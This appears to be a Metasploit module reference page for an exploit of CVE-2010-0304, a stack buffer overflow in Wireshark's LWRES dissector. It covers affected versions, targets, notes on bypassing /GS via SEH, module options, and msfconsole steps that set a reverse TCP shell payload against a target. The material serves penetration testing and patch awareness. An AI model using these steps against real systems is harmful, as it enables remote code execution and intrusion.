Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.
Exploit Rank
- Great
Exploit Authors
- babi < >
- jduck < jduck [at] metasploit.com >
- redsand < >
Vulnerability References
- CVE-2010-0304
- OSVDB-61987
- BID-37985
- http://www.wireshark.org/security/wnpa-sec-2010-02.html
- http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?...
Exploit Targets
- 0 - tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)
- 1 - wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)
- 2 - wireshark 1.2.5 on RHEL 5.4 (x64)
- 3 - wireshark 1.2.5 on Mac OS X 10.5 (x86)
- 4 - wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)
Exploit Development
Similar Exploit Modules
- exploit/multi/misc/batik_svg_java
- exploit/multi/misc/hp_vsa_exec
- exploit/multi/misc/java_rmi_server
- exploit/multi/misc/openview_omniback_exec
- exploit/multi/misc/veritas_netbackup_cmdexec
- exploit/multi/misc/wireshark_lwres_getaddrbyname_loop
- exploit/multi/misc/zend_java_bridge
Exploit Usage Information
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/multi/misc/wireshark_lwres_getaddrbyname
msf exploit(wireshark_lwres_getaddrbyname) > show payloads
msf exploit(wireshark_lwres_getaddrbyname) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(wireshark_lwres_getaddrbyname) > set LHOST [MY IP ADDRESS]
msf exploit(wireshark_lwres_getaddrbyname) > set RHOST [TARGET IP]
msf exploit(wireshark_lwres_getaddrbyname) > show targets
msf exploit(wireshark_lwres_getaddrbyname) > set TARGET [TARGET ID]
msf exploit(wireshark_lwres_getaddrbyname) > exploit
Exploit Module Options
| INTERFACE | The name of the interface |
| RHOST | The target address |
| RPORT | The target port (default: 921) |
| SHOST | This option can be used to specify a spoofed source address |
| SNAPLEN | The number of bytes to capture (default: 65535) |
| TIMEOUT | The number of seconds to wait for new data (default: 500) |
| CHOST | The local client address |
| CPORT | The local client port |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| GATEWAY | The gateway IP address. This will be used rather than a random remote address for the UDP probe, if set. |
| NETMASK | The local network mask. This is used to decide if an address is in the local network. |
| UDP_SECRET | The 32-bit cookie for UDP probe requests. |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |